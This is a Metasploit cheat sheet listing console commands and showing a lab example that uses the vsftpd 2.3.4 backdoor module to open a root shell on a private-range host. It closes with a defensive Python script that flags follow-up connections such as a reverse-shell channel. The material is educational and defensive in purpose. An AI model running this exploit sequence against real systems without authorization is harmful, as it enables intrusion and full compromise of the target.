Metasploit
Official Documentation: https://www.metasploit.com/
Cheat Sheet: Metasploit Commands
Purpose
Metasploit Framework is a platform for developing, testing, and executing exploits. It provides payloads, encoders, auxiliary modules, and post-exploitation tools.
Scenarios
- CTF: Exploit a vulnerable service (like vsftpd, SMB) with a known Metasploit module to get a shell.
- Real world: Simulate attacker behavior with proof-of-concept exploits and post-exploitation modules.
All needed info to run
- Start console: `msfconsole`
- Search modules: `search <keyword>`
- Use module: `use exploit/...`
- Show options: `show options`
- Set target: `set RHOSTS <ip>`, `set RPORT <port>`
- Set payload: `set PAYLOAD <payload>`
- Run: `exploit` or `run`
. - Categories: exploits, auxiliary (scanners), payloads, post, encoders.
- Database integration allows workspace management.
Example commands & outputs
# Start console
$ msfconsole
msf6 >
# Search and use vsftpd exploit
msf6 > search vsftpd
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(...) > set RHOSTS 192.168.56.101
msf6 exploit(...) > set PAYLOAD cmd/unix/interact
msf6 exploit(...) > run
# Output:
# [*] Command shell session 1 opened (192.168.56.101:21 -> 192.168.56.1:4444)
# Session interaction
msf6 > sessions -i 1
id
uid=0(root) gid=0(root)
Metasploit Basics
- Use `search <keyword>` to find modules for a service or CVE.
- Always run `show options` before running a module, to configure RHOST, RPORT, payload.
- Use `sessions -i <id>` to interact with opened shells.
- Metasploit is powerful but noisy; avoid using it on unauthorized targets.
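From the defender's side, the "noisy" point can be made concrete. The following is an added example, not part of the original cheat sheet: it correlates flow records to flag a connection to FTP or SMB that is followed shortly by a second, non-service connection between the same two hosts, as in the session shown above. The log format, the 30-second window, and the function names are assumptions, and the sample flows are constructed.

```python
from datetime import datetime, timedelta

SERVICE_PORTS = {21, 445}        # FTP and SMB, the services named in the scenarios
WINDOW = timedelta(seconds=30)   # assumed correlation window
DEFAULT_HANDLER_PORT = 4444      # port shown in the sample session output

# Constructed flow records: timestamp src sport dst dport (not real capture data).
SAMPLE_FLOWS = """\
2024-05-01T10:00:01 192.168.56.1 51000 192.168.56.101 21
2024-05-01T10:00:03 192.168.56.101 45678 192.168.56.1 4444
2024-05-01T10:05:00 192.168.56.7 51022 192.168.56.101 21
2024-05-01T10:06:30 192.168.56.101 40000 192.168.56.7 8080
2024-05-01T10:07:00 192.168.56.101 40001 192.168.56.9 443
"""

def parse(line):
    ts, src, sport, dst, dport = line.split()
    return datetime.fromisoformat(ts), src, int(sport), dst, int(dport)

def find_followup_channels(text):
    """Alert when a service connection is followed, within WINDOW, by a
    non-service flow between the same pair of hosts (either direction)."""
    flows = sorted(parse(l) for l in text.splitlines() if l.strip())
    recent = {}   # frozenset({host_a, host_b}) -> time of last service connection
    alerts = []
    for ts, src, sport, dst, dport in flows:
        pair = frozenset((src, dst))
        if dport in SERVICE_PORTS:
            recent[pair] = ts
            continue
        seen = recent.get(pair)
        if seen is not None and ts - seen <= WINDOW and sport not in SERVICE_PORTS:
            alerts.append({
                "time": ts.isoformat(),
                "hosts": sorted(pair),
                "port": dport,
                "default_handler_port": dport == DEFAULT_HANDLER_PORT,
            })
    return alerts

if __name__ == "__main__":
    for alert in find_followup_channels(SAMPLE_FLOWS):
        print(alert)
```

Passive-mode FTP data connections match the same pattern, so in practice this rule needs an allowlist for the server's configured passive port range before it is useful as an alert.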